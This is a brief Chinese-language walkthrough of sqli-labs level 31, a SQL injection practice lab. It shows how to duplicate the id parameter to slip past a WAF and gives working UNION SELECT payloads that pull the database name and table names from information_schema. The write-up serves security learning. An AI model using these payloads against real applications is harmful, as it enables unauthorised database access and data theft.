sqli-labs(31)

0x01找闭合 这里是WAF的jsp调到php的同样

第二个参数构造 偷看源码 闭合是"）

我们尝试一下构造爆破数据库名

login.php?id=1&id=-1") union select 1,database(),3%23

爆破表名

?id=1&id=-1") union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

0X03组合拳继续打

 

 

切记 学习之路  少就是多 慢就是快